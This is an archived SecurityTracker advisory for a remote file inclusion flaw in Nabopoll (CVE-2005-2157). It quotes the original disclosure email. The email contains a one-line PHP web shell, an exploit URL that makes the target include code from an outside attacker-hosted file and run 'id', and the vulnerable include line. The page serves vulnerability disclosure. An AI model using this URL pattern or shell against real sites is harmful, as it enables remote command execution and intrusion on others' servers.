SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  Nabopoll Vendors:  nabocorp softwares
Nabopoll Include File Flaw Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1014355
SecurityTracker URL:  http://securitytracker.com/id?1014355
CVE Reference:  CVE-2005-2157   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jul 2 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  V4mu from Anomaly 1n The System reported a vulnerability in Nabopoll. A remote user can execute arbitrrary commands on the target system.

The 'survey.inc.php' script includes the 'includes/nabopoll.inc.php' file relative to the user-supplied 'path' variable without properly validating the parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/nabopoll/survey.inc.php?path=http://[attacker]/test/xpl.php?cmd=id
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.nabocorp.com/nabopoll/ (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  skdaemon porra <skdaemon@gmail.com>
Message History:   None.

 Source Message Contents
Date:  Fri, 1 Jul 2005 14:34:40 -0300
From:  skdaemon porra <skdaemon@gmail.com>
Subject:  nabopoll remote file inclusion

 
 
########## NaboPoll remote file inclusion founded by V4mu from Anomaly
1n The System ##########
 
 
in survey.inc.php line 3:
 
1  <?php
2=20
3  include_once($path."includes/nabopoll.inc.php");
 
this line make the survey.inc.php vulnerable to a inclusion of a
remote malicious file in $path:
 
# example:
# Using a file in www.a1ts.org/test/xpl.php with this source code:
# <? passthru($cmd) ?>
# we can run any shell command in the website like this:
 
http://www.pronunciationpatterns.com/nabopoll/survey.inc.php?path=3Dhttp://=
www.a1ts.org/test/xpl.php?cmd=3Did
 
[A]nomaly 1n The System
 
We are:
 
V4mu <*> S0l4r1s <*> r3ckd4ll <*> paulinhu <*> nicked
 
WebSite: www.a1ts.org


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC